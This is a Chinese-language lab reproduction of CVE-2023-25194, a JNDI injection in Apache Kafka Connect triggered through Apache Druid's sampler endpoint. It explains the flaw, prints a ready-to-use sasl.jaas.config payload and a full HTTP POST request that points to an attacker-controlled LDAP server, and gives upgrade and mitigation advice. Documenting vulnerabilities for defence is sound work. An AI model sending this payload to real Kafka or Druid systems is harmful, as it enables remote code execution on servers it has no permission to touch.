漏洞原理

	Apache Kafka Connect中存在JNDI注入漏洞，当攻击者可访问Kafka Connect Worker，且可以创建或修改连接器时，通过设置sasl.jaas.config属性为com.sun.security.auth.module.JndiLoginModule，进而可导致JNDI注入，造成RCE需低版本JDK或目标Kafka Connect系统中存在利用链。
	通过 Aiven API 或 Kafka Connect REST API 配置连接器时，攻击者可以为连接器设置database.history.producer.sasl.jaas.config连接器属性io.debezium.connector.mysql.MySqlConnector。其他 debezium 连接器也可能如此。通过将连接器值设置为"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://attacker_server" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"

漏洞影响范围

2.3.0 <= Apache Kafka <= 3.3.2

漏洞复现过程

我是通过vulhub下载的环境，下载后直接启动即可。

打开页面，漏洞点在Load data功能页中。

在Load data功能页中的Streaming功能中。

在该功能中，将payload填写到Consumer properties属性值中即可。

"bootstrap.servers":"127.0.0.1:6666",
              "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
 "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://192.168.204.129:1389/bip2vt\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"

在payload提交前，请先在vps机器中开启ldap服务。

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 192.168.204.134:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 874
Origin: http://192.168.204.134:8888
DNT: 1
Connection: close
Referer: http://192.168.204.134:8888/unified-console.html
Cookie: io=iiZapP9jVyiNUZegAAAF

{"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{"bootstrap.servers":"127.0.0.1:6666",
      "sasl.mechanism":"SCRAM-SHA-256",
        "security.protocol":"SASL_SSL",
 "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://192.168.204.129:1389/bip2vt\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"},"topic":"aa","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\\s\\S]*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig":{"type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

使用低版本的jdk中的ldap服务即可。

修复建议

1、升级版本。
2、无法升级的用户可通过验证Kafka Connect连接器配置，仅允许受信任的JNDI配置来缓解此漏洞。

参考链接

Apache Kafka Connect JNDI注入漏洞复现(CVE-2023-25194):https://blog.csdn.net/qq_41904294/article/details/129634971?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-129634971-blog-128962935.235%5Ev35%5Epc_relevant_default_base&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-129634971-blog-128962935.235%5Ev35%5Epc_relevant_default_base&utm_relevant_index=2
CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞:https://blog.csdn.net/Fiverya/article/details/128964828
Apache Kafka JNDI注入(CVE-2023-25194)漏洞复现浅析:https://blog.csdn.net/qq_38154820/article/details/129742672